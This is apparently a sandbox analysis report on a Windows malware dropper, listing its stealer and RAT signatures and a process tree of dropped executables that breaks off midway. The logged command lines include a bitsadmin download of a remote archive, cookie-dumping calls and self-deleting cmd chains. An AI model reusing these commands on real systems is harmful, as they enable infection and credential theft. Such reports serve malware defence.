Analysis

  • max time kernel
    69s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    04-05-2021 10:02

General

  • Target

    E73E4BC10B7F598BE39D301C1FE89961.exe

  • Size

    7.0MB

  • MD5

    e73e4bc10b7f598be39d301c1fe89961

  • SHA1

    b4d75eae000cb9c26421773d321366242aa13ee3

  • SHA256

    87bce52ffa3eaa55981a2dd9af96ce156249a9bfcfd9b3930252cdeff9e8633d

  • SHA512

    35fa8a1889b21db2217ddfa1dc171efd231f775333d839d37121c8c1953b4bef9edbb44b49f4fee1014b4df3ab5c412c06fc423efd2bee719b96f4e75723b4a6

Malware Config

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 33 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 11 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 2 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 14 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Runs ping.exe 1 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:356
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Themes
      1⤵
        PID:1300
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2812
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
          1⤵
            PID:2696
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2680
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2472
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
              1⤵
                PID:2436
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                1⤵
                  PID:1900
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                  1⤵
                    PID:1444
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                    1⤵
                      PID:1236
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1084
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                          PID:864
                        • C:\Users\Admin\AppData\Local\Temp\E73E4BC10B7F598BE39D301C1FE89961.exe
                          "C:\Users\Admin\AppData\Local\Temp\E73E4BC10B7F598BE39D301C1FE89961.exe"
                          1⤵
                          • Drops file in Program Files directory
                          • Suspicious use of WriteProcessMemory
                          PID:4044
                          • C:\Program Files (x86)\Microsoft Data\Versium Research\hjjgaa.exe
                            "C:\Program Files (x86)\Microsoft Data\Versium Research\hjjgaa.exe"
                            2⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of WriteProcessMemory
                            PID:3788
                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              3⤵
                              • Executes dropped EXE
                              PID:1480
                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              3⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4164
                          • C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe
                            "C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe"
                            2⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Checks processor information in registry
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2904
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
                              3⤵
                                PID:5100
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /im RunWW.exe /f
                                  4⤵
                                  • Kills process with taskkill
                                  PID:744
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 6
                                  4⤵
                                  • Delays execution with timeout.exe
                                  PID:4512
                            • C:\Program Files (x86)\Microsoft Data\Versium Research\jg7_7wjg.exe
                              "C:\Program Files (x86)\Microsoft Data\Versium Research\jg7_7wjg.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks whether UAC is enabled
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3616
                            • C:\Program Files (x86)\Microsoft Data\Versium Research\guihuali-game.exe
                              "C:\Program Files (x86)\Microsoft Data\Versium Research\guihuali-game.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetWindowsHookEx
                              • Suspicious use of WriteProcessMemory
                              PID:4024
                              • C:\Windows\SysWOW64\rundll32.exe
                                "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                3⤵
                                • Loads dropped DLL
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:1716
                            • C:\Program Files (x86)\Microsoft Data\Versium Research\LabPicV3.exe
                              "C:\Program Files (x86)\Microsoft Data\Versium Research\LabPicV3.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:3644
                              • C:\Users\Admin\AppData\Local\Temp\is-44CEB.tmp\LabPicV3.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-44CEB.tmp\LabPicV3.tmp" /SL5="$10206,506127,422400,C:\Program Files (x86)\Microsoft Data\Versium Research\LabPicV3.exe"
                                3⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of WriteProcessMemory
                                PID:2676
                                • C:\Users\Admin\AppData\Local\Temp\is-VJULE.tmp\3316505.exe
                                  "C:\Users\Admin\AppData\Local\Temp\is-VJULE.tmp\3316505.exe" /S /UID=lab214
                                  4⤵
                                  • Drops file in Drivers directory
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  PID:4424
                                  • C:\Program Files\Windows Photo Viewer\MFJLNDWPQV\prolab.exe
                                    "C:\Program Files\Windows Photo Viewer\MFJLNDWPQV\prolab.exe" /VERYSILENT
                                    5⤵
                                    • Executes dropped EXE
                                    PID:4196
                                    • C:\Users\Admin\AppData\Local\Temp\is-GN1CA.tmp\prolab.tmp
                                      "C:\Users\Admin\AppData\Local\Temp\is-GN1CA.tmp\prolab.tmp" /SL5="$A01D6,575243,216576,C:\Program Files\Windows Photo Viewer\MFJLNDWPQV\prolab.exe" /VERYSILENT
                                      6⤵
                                      • Executes dropped EXE
                                      • Drops file in Program Files directory
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of FindShellTrayWindow
                                      PID:3980
                                  • C:\Users\Admin\AppData\Local\Temp\1f-2103d-3d4-a2fac-307b6d8418621\Dezhobaewito.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1f-2103d-3d4-a2fac-307b6d8418621\Dezhobaewito.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    • Checks computer location settings
                                    PID:4720
                                  • C:\Users\Admin\AppData\Local\Temp\cc-b04cb-4ec-95597-1806417101b19\Naqashilyti.exe
                                    "C:\Users\Admin\AppData\Local\Temp\cc-b04cb-4ec-95597-1806417101b19\Naqashilyti.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    PID:4656
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\svzor0fh.twv\sskiper.exe /s & exit
                                      6⤵
                                        PID:6424
                                        • C:\Users\Admin\AppData\Local\Temp\svzor0fh.twv\sskiper.exe
                                          C:\Users\Admin\AppData\Local\Temp\svzor0fh.twv\sskiper.exe /s
                                          7⤵
                                          • Executes dropped EXE
                                          PID:6612
                                          • C:\Users\Admin\AppData\Local\Temp\258345367.exe
                                            C:\Users\Admin\AppData\Local\Temp\258345367.exe
                                            8⤵
                                            • Executes dropped EXE
                                            PID:5204
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\svzor0fh.twv\sskiper.exe & exit
                                            8⤵
                                              PID:1916
                                              • C:\Windows\SysWOW64\PING.EXE
                                                ping 0
                                                9⤵
                                                • Runs ping.exe
                                                PID:5104
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lse4ug0y.fyy\KiffMainE1.exe & exit
                                          6⤵
                                            PID:7132
                                            • C:\Users\Admin\AppData\Local\Temp\lse4ug0y.fyy\KiffMainE1.exe
                                              C:\Users\Admin\AppData\Local\Temp\lse4ug0y.fyy\KiffMainE1.exe
                                              7⤵
                                                PID:4976
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\udfcjpx1.dw1\001.exe & exit
                                              6⤵
                                                PID:3192
                                                • C:\Users\Admin\AppData\Local\Temp\udfcjpx1.dw1\001.exe
                                                  C:\Users\Admin\AppData\Local\Temp\udfcjpx1.dw1\001.exe
                                                  7⤵
                                                    PID:2748
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ag15myd4.ds5\installer.exe /qn CAMPAIGN="654" & exit
                                                  6⤵
                                                    PID:4512
                                                    • C:\Users\Admin\AppData\Local\Temp\ag15myd4.ds5\installer.exe
                                                      C:\Users\Admin\AppData\Local\Temp\ag15myd4.ds5\installer.exe /qn CAMPAIGN="654"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:5144
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d1yhoat2.2d5\gpooe.exe & exit
                                                    6⤵
                                                      PID:5652
                                                      • C:\Users\Admin\AppData\Local\Temp\d1yhoat2.2d5\gpooe.exe
                                                        C:\Users\Admin\AppData\Local\Temp\d1yhoat2.2d5\gpooe.exe
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:5832
                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:6004
                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:5052
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\brtii35n.cbo\google-game.exe & exit
                                                      6⤵
                                                        PID:7008
                                                        • C:\Users\Admin\AppData\Local\Temp\brtii35n.cbo\google-game.exe
                                                          C:\Users\Admin\AppData\Local\Temp\brtii35n.cbo\google-game.exe
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:6704
                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                            "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                            8⤵
                                                            • Loads dropped DLL
                                                            • Modifies registry class
                                                            PID:6848
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qdwtamqg.2fy\y1.exe & exit
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:2748
                                                        • C:\Users\Admin\AppData\Local\Temp\qdwtamqg.2fy\y1.exe
                                                          C:\Users\Admin\AppData\Local\Temp\qdwtamqg.2fy\y1.exe
                                                          7⤵
                                                            PID:5660
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jvptmxol.ccd\askinstall39.exe & exit
                                                          6⤵
                                                            PID:5500
                                                            • C:\Users\Admin\AppData\Local\Temp\jvptmxol.ccd\askinstall39.exe
                                                              C:\Users\Admin\AppData\Local\Temp\jvptmxol.ccd\askinstall39.exe
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:5816
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                8⤵
                                                                  PID:2516
                                                                  • C:\Windows\System32\Conhost.exe
                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    9⤵
                                                                    • Executes dropped EXE
                                                                    PID:5212
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /f /im chrome.exe
                                                                    9⤵
                                                                    • Kills process with taskkill
                                                                    PID:6920
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hbpyjzs5.tvw\setup.exe & exit
                                                              6⤵
                                                                PID:6008
                                                                • C:\Users\Admin\AppData\Local\Temp\hbpyjzs5.tvw\setup.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\hbpyjzs5.tvw\setup.exe
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:6396
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\hbpyjzs5.tvw\setup.exe"
                                                                    8⤵
                                                                      PID:5792
                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                        ping 1.1.1.1 -n 1 -w 3000
                                                                        9⤵
                                                                        • Runs ping.exe
                                                                        PID:5084
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zknkzjmf.1pg\SunLabsPlayer.exe /S & exit
                                                                  6⤵
                                                                    PID:6568
                                                                    • C:\Users\Admin\AppData\Local\Temp\zknkzjmf.1pg\SunLabsPlayer.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\zknkzjmf.1pg\SunLabsPlayer.exe /S
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Drops file in Program Files directory
                                                                      PID:6804
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa562.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:4832
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa562.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:3740
                                                                            • C:\Windows\System32\Conhost.exe
                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              9⤵
                                                                                PID:5680
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa562.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:5520
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa562.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:6024
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa562.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:5360
                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      9⤵
                                                                                        PID:6864
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa562.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:6136
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa562.tmp\tempfile.ps1"
                                                                                        8⤵
                                                                                          PID:4080
                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                          "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                          8⤵
                                                                                          • Download via BitsAdmin
                                                                                          PID:4972
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sq4d01lj.jgd\005.exe & exit
                                                                                      6⤵
                                                                                        PID:6744
                                                                                        • C:\Users\Admin\AppData\Local\Temp\sq4d01lj.jgd\005.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\sq4d01lj.jgd\005.exe
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6720
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tuuotyzh.3md\ifhwwyy.exe & exit
                                                                                        6⤵
                                                                                          PID:6840
                                                                                          • C:\Users\Admin\AppData\Local\Temp\tuuotyzh.3md\ifhwwyy.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\tuuotyzh.3md\ifhwwyy.exe
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4356
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              8⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5384
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              8⤵
                                                                                                PID:5360
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gv00tkqm.q55\toolspab1.exe & exit
                                                                                            6⤵
                                                                                              PID:5280
                                                                                              • C:\Users\Admin\AppData\Local\Temp\gv00tkqm.q55\toolspab1.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\gv00tkqm.q55\toolspab1.exe
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:1988
                                                                                                • C:\Users\Admin\AppData\Local\Temp\gv00tkqm.q55\toolspab1.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\gv00tkqm.q55\toolspab1.exe
                                                                                                  8⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Checks SCSI registry key(s)
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  PID:6460
                                                                                    • C:\Program Files (x86)\Microsoft Data\Versium Research\lylal220.exe
                                                                                      "C:\Program Files (x86)\Microsoft Data\Versium Research\lylal220.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:2920
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-GR8PI.tmp\lylal220.tmp
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-GR8PI.tmp\lylal220.tmp" /SL5="$1020C,237286,153600,C:\Program Files (x86)\Microsoft Data\Versium Research\lylal220.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:1316
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-VJULD.tmp\4_177039.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-VJULD.tmp\4_177039.exe" /S /UID=lylal220
                                                                                          4⤵
                                                                                          • Drops file in Drivers directory
                                                                                          • Executes dropped EXE
                                                                                          • Adds Run key to start application
                                                                                          PID:4352
                                                                                          • C:\Program Files\Internet Explorer\MFJLNDWPQV\irecord.exe
                                                                                            "C:\Program Files\Internet Explorer\MFJLNDWPQV\irecord.exe" /VERYSILENT
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5108
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-0D48G.tmp\irecord.tmp
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-0D48G.tmp\irecord.tmp" /SL5="$2023A,6139911,56832,C:\Program Files\Internet Explorer\MFJLNDWPQV\irecord.exe" /VERYSILENT
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              • Drops file in Program Files directory
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                              PID:3144
                                                                                              • C:\Program Files (x86)\recording\i-record.exe
                                                                                                "C:\Program Files (x86)\recording\i-record.exe" -silent -desktopShortcut -programMenu
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                PID:4608
                                                                                          • C:\Users\Admin\AppData\Local\Temp\a0-89527-239-5e4ad-d54aa1e79cfc1\Jexagugusha.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\a0-89527-239-5e4ad-d54aa1e79cfc1\Jexagugusha.exe"
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:4012
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\04ahh2de.nr2\sskiper.exe /s & exit
                                                                                              6⤵
                                                                                                PID:6056
                                                                                                • C:\Users\Admin\AppData\Local\Temp\04ahh2de.nr2\sskiper.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\04ahh2de.nr2\sskiper.exe /s
                                                                                                  7⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:6360
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\258345367.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\258345367.exe
                                                                                                    8⤵
                                                                                                      PID:5212
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1877735849.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\1877735849.exe
                                                                                                      8⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:6116
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\04ahh2de.nr2\sskiper.exe & exit
                                                                                                      8⤵
                                                                                                        PID:860
                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                          ping 0
                                                                                                          9⤵
                                                                                                          • Runs ping.exe
                                                                                                          PID:5044
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zdgiozlg.zuy\KiffMainE1.exe & exit
                                                                                                    6⤵
                                                                                                      PID:6640
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\zdgiozlg.zuy\KiffMainE1.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\zdgiozlg.zuy\KiffMainE1.exe
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:6832
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qzgnaghg.odw\001.exe & exit
                                                                                                      6⤵
                                                                                                        PID:7156
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\qzgnaghg.odw\001.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\qzgnaghg.odw\001.exe
                                                                                                          7⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:2712
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vrn3kl0g.om3\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                        6⤵
                                                                                                          PID:4816
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vrn3kl0g.om3\installer.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\vrn3kl0g.om3\installer.exe /qn CAMPAIGN="654"
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Enumerates connected drives
                                                                                                            • Modifies system certificate store
                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                            PID:4548
                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\vrn3kl0g.om3\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\vrn3kl0g.om3\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619870683 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                              8⤵
                                                                                                                PID:5908
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pnzjtsmv.5gg\gpooe.exe & exit
                                                                                                            6⤵
                                                                                                              PID:5392
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\pnzjtsmv.5gg\gpooe.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\pnzjtsmv.5gg\gpooe.exe
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5560
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                  8⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:5896
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
